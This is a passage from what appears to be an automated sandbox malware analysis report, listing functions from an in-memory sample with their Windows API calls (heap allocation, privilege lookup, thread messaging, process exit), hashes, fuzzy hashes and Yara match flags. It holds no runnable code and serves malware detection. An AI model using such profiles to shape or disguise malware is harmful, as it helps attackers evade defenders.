                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                          Function 01062B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                          • Instruction ID: 6d5237f6bd414a9e99391eb0fa6da1e4f3f20399f4ad4f2e1beefd0a31ecb1c0
                                                          • Opcode Fuzzy Hash: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                          • Instruction Fuzzy Hash: 8590026160240013510571588418616400A97E0201B55C032E1414590DC52589916239
                                                          Function 01062BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                          • Instruction ID: a4e52be28d6bac75171fd665bedc4fca1ac0295c310e0af44a53de9e0240c36a
                                                          • Opcode Fuzzy Hash: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                          • Instruction Fuzzy Hash: 4A90023160140812E1807158840864A000597D1301F95C026A0425654DCA158B5977B5
                                                          Function 01062AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                          • Instruction ID: 5f254275852c5678a183339484c9b3593d764e118162c03432650336d08fa9d3
                                                          • Opcode Fuzzy Hash: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                          • Instruction Fuzzy Hash: B5900435711400131105F55C470C5070047D7D5351355C033F1415550CD731CD715335
                                                          Function 01062D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5e47f8172656296ebb05559ed9e6b28fc92c9eab135544604c391ff4057db310
                                                          • Instruction ID: 6de118af997f52117a21d7e142039fe8db7516e58bf55ddca3e3281c8477b3ef
                                                          • Opcode Fuzzy Hash: 5e47f8172656296ebb05559ed9e6b28fc92c9eab135544604c391ff4057db310
                                                          • Instruction Fuzzy Hash: 5A90022961340012E1807158940C60A000597D1202F95D426A0415558CC91589695335
                                                          Function 01062D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 33ade9ccdda1cf12cc131f609b1232a2ed799282b1702e9bcc5084ad089c31cb
                                                          • Instruction ID: ad87f1484f1cd09f47f3631e19d23cd4d260d3e34964be8b54ee30a172d4689d
                                                          • Opcode Fuzzy Hash: 33ade9ccdda1cf12cc131f609b1232a2ed799282b1702e9bcc5084ad089c31cb
                                                          • Instruction Fuzzy Hash: 4D90022170140013E1407158941C6064005E7E1301F55D022E0814554CD91589565336
                                                          Function 01062DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bf636288cb49fe5108bf8fb0d603a51574a0ef6388839b0ab10a058d81d89c00
                                                          • Instruction ID: d8a0a8ccfde83e8aedbf1387914a379bbd36ba3239b8e5d8c0f08e44e6529825
                                                          • Opcode Fuzzy Hash: bf636288cb49fe5108bf8fb0d603a51574a0ef6388839b0ab10a058d81d89c00
                                                          • Instruction Fuzzy Hash: 03900221642441626545B15884085074006A7E0241795C023A1814950CC5269956D735
                                                          Function 01062DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                          • Instruction ID: 79bc78b5bafbf0c4261f879b9e78d1113e9d34510f9cebbc85aab05a96d7ff08
                                                          • Opcode Fuzzy Hash: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                          • Instruction Fuzzy Hash: CF90023160140423E11171588508707000997D0241F95C423A0824558DD6568A52A235
                                                          Function 01062C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                          • Instruction ID: ebd15194420f866bcfa9776b30be70a9e159470a2dd4d3f3c3446a24b98bf0b7
                                                          • Opcode Fuzzy Hash: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                          • Instruction Fuzzy Hash: 7290023160148812E1107158C40874A000597D0301F59C422A4824658DC69589917235
                                                          Function 01062CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a1fa70a360b975d212e9626fdabae89a2adb0300a5e467e18ece4b2126d5420a
                                                          • Instruction ID: d4a6e500bacf65fab5ed14238aa5c47ec34471ec854ceae5815b220f3aa0b08c
                                                          • Opcode Fuzzy Hash: a1fa70a360b975d212e9626fdabae89a2adb0300a5e467e18ece4b2126d5420a
                                                          • Instruction Fuzzy Hash: B690023160140412E1007598940C646000597E0301F55D022A5424555EC66589916235
                                                          Function 01062F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5cc80b228c8b264dfaf954ce7c509e1ccf0db921134eacd7879fa35efe433f59
                                                          • Instruction ID: 5decb08e76313d8baec5db3acb2069256ed9fdfb6aadc17b9b7b3b31382b42ab
                                                          • Opcode Fuzzy Hash: 5cc80b228c8b264dfaf954ce7c509e1ccf0db921134eacd7879fa35efe433f59
                                                          • Instruction Fuzzy Hash: 5990026174140452E10071588418B060005D7E1301F55C026E1464554DC619CD52623A
                                                          Function 01062F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 525eb5a6b748ea024424193e8236852beb4105e678f76b623a7bbbbb83f87071
                                                          • Instruction ID: 197f7ced16435321ce96bad39edac0729a3e277731cb4dc2def5fdd844cc2745
                                                          • Opcode Fuzzy Hash: 525eb5a6b748ea024424193e8236852beb4105e678f76b623a7bbbbb83f87071
                                                          • Instruction Fuzzy Hash: 0690023160180412E1007158881870B000597D0302F55C022A1564555DC62589516675
                                                          Function 01062FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cb0da710165b7b62566ad423d80630e9d0e95f02f64b5fe20f6210f1b8fe2fa2
                                                          • Instruction ID: e574b6a2064d050841be9e42686aa7670671ae01b3ce9f9eab970eda8deddc97
                                                          • Opcode Fuzzy Hash: cb0da710165b7b62566ad423d80630e9d0e95f02f64b5fe20f6210f1b8fe2fa2
                                                          • Instruction Fuzzy Hash: D1900221A014005251407168C8489064005BBE1211755C132A0D98550DC55989655779
                                                          Function 01062FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 61dac055f7d659a55ea6e87e548e8e2a0caaada6944cf097eeea30afc4d8acb8
                                                          • Instruction ID: 709e4a18c20156b18ce43dc86c0a6690748cb808cc567e722dde51ef6d084f41
                                                          • Opcode Fuzzy Hash: 61dac055f7d659a55ea6e87e548e8e2a0caaada6944cf097eeea30afc4d8acb8
                                                          • Instruction Fuzzy Hash: 07900221611C0052E20075688C18B07000597D0303F55C126A0554554CC91589615635
                                                          Function 01062E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a1144b413d8713b914823cd22dfd562e8f62b6ac1fef17fff63e7705e0bfacb9
                                                          • Instruction ID: 016de5c0ee11346d954cb22c2acb9963a199cfbaead3180e7ec4e1f55d4bef1f
                                                          • Opcode Fuzzy Hash: a1144b413d8713b914823cd22dfd562e8f62b6ac1fef17fff63e7705e0bfacb9
                                                          • Instruction Fuzzy Hash: DB900221A0140512E10171588408616000A97D0241F95C033A1424555ECA258A92A235
                                                          Function 01062EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a7778d2abbbfe2a59cbdce0e2be67a90f52d6b5e172c1a1cc91eb06e07fc3477
                                                          • Instruction ID: 670a7c28915f64fa90b2e838cefd2b2e23751a94452add0d69e5a75c94d336ab
                                                          • Opcode Fuzzy Hash: a7778d2abbbfe2a59cbdce0e2be67a90f52d6b5e172c1a1cc91eb06e07fc3477
                                                          • Instruction Fuzzy Hash: 9C90027160140412E14071588408746000597D0301F55C022A5464554EC6598ED56779
                                                          Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                          Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6 41a620-41a651 call 41af50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &EA
                                                          • API String ID: 1279760036-1330915590
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                          Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 225 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 234 40835c-40836e PostThreadMessageW 225->234 235 40838e-408392 225->235 236 408370-40838a call 40a470 234->236 237 40838d 234->237 236->237 237->235
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: f1d72b6fd9c5dbb7acd897e30db6e8d22c5b8e07925bf11e236953ca1c444ec2
                                                          • Instruction ID: cd90b47104bd9a6ee710ac924b004e65f80e09b3f01bf4e72bdab6c263ad1cec
                                                          • Opcode Fuzzy Hash: f1d72b6fd9c5dbb7acd897e30db6e8d22c5b8e07925bf11e236953ca1c444ec2
                                                          • Instruction Fuzzy Hash: E201B971A803187AE720A6958C03FFF7B6CAB44B54F05412EFF04BB1C1D6B8690547E9
                                                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 240 408310-40831f 241 408328-40835a call 41c9f0 call 40ace0 call 414e40 240->241 242 408323 call 41be50 240->242 249 40835c-40836e PostThreadMessageW 241->249 250 40838e-408392 241->250 242->241 251 408370-40838a call 40a470 249->251 252 40838d 249->252 251->252 252->250
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                          • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                          Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 276 41a7b1-41a7d9 277 41a7df-41a7f4 LookupPrivilegeValueW 276->277 278 41a7da call 41af50 276->278 278->277
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c2805c0445263fc07bc243aab8ab46a4a256e4c5e5974922365246541f942c2e
                                                          • Instruction ID: 45f9f379559e80912eda46d75105db880b5e87fdc8b3523c54064ba733369719
                                                          • Opcode Fuzzy Hash: c2805c0445263fc07bc243aab8ab46a4a256e4c5e5974922365246541f942c2e
                                                          • Instruction Fuzzy Hash: A8E0EDB6200204AFDB20DF99CC80ED7779C9F89250F108259FA0C9B202D934E82087F4
                                                          Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 279 41a660-41a691 call 41af50 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                          Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                          Function 0041A694 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 65d059f6bc989aa4ce25401a129b7f23ffb0f9bb50518349adf2edb9e19f8326
                                                          • Instruction ID: f77895502a049447ed8ecdd220cc497d7b2cb3c844924e70b140afc7f5428cf5
                                                          • Opcode Fuzzy Hash: 65d059f6bc989aa4ce25401a129b7f23ffb0f9bb50518349adf2edb9e19f8326
                                                          • Instruction Fuzzy Hash: ECE0C2716042007FD620CF98CC86FD337A9DF4C390F008069BA1C9B792C530AA00CBE1
                                                          Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                          Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: fd2cc3c05a77108497192d8d22d8c2baaa0c434313ac3d8dd558e0832ae1325a
                                                          • Instruction ID: 7c97fca8a206153f04093e510c3a28fa5ea3a57110df672cf34e8375d9b1a330
                                                          • Opcode Fuzzy Hash: fd2cc3c05a77108497192d8d22d8c2baaa0c434313ac3d8dd558e0832ae1325a
                                                          • Instruction Fuzzy Hash: 66B09BA859B1401787016E344C738C76714045410477D647545A55D20FE819911F67F7
                                                          Function 01062C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                          • Instruction ID: 6d86120faf6238cbd15f4ffa2c51dc0128570c90c2310e7c6eb345e307dead2b
                                                          • Opcode Fuzzy Hash: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                          • Instruction Fuzzy Hash: 62B09B71D015C5D9EA51F764460C717794477D0711F15C072D2430641F4738C1D1E275

                                                          Non-executed Functions

